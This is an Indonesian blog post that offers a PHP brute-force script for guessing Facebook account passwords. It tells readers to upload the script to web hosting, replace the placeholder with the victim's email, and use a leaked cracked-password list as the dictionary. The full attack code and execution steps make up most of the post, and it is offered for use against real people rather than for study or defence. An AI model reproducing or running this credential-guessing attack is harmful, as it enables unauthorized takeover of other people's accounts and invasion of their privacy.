Kamis, 17 November 2011

Facebook Brute force attack!

Bahan2 yg di butuhkan:

Upload 3 file berikut di web hosting kamu (usahakan yg berbayar, coz klo yg gratisan suka ga support) Sedih

1.fb.php yang isinya skrip brute force
2.dictionary.txt
3.cookie.txt

ingat musti satu folder

edit bagian ini $username ="brute@force.org";

ganti dgn email korban

jalankan/eksekusi /fb.php .

Oke, ini skrip brute force-nya

Code:
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found : 
$line
";}
}
?>
File dictionary.txt nya bisa kamu bikin sendiri, atau ngambil dari yg udh ada. Kalo malas bikin, ambil di sini http://darkc0de.com/database/cracked.txt . Tinggal buang bagian md5-nya.

File cookies.txt kosongkan saja.

Oke, ada 2 cara meng-eksekusi file fb.php/skrip brute force.

1.) Menggunakan web browser. Cara ini mudah, tapi relatif lbh lama. Karna kita tau, kalau modus grafis selalu lebih lamban di banding modus text. Cara nya tinggal upload semua file2 di atas ke web hosting, lalu jalankan melalui browser. Gampang kan? tampi lambreta abisss!. Web browser favorit saya adalah Firefox.

2.)Menggunakan SSH client. Cara ini lbh cepat, tapi relatif lbh sulit. Selain itu kita jg harus punya web hosting sendiri, coz web hosting gratisan biasa-nya tidak akan memberi hak SSH pada kita Tolong. Cara-nya kita harus meng-eksekusi skrip via SSH client/console yg sudah terkoneksi ke server kita. SSH client favorit saya adalah Putty.

Ingat, tidak semua FB bisa di crack dng cara ini... semua tergantung database dari Dictionary.txt jg dari tinggkat kerumitan Password. So... inti-nya cuma satu... SABAR... Mentok
Silahkah di coba... Bigsmile[/align]

Diposting oleh Boeim di 20.16
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 
./BoeimCyber © 2011 Templates | Boeim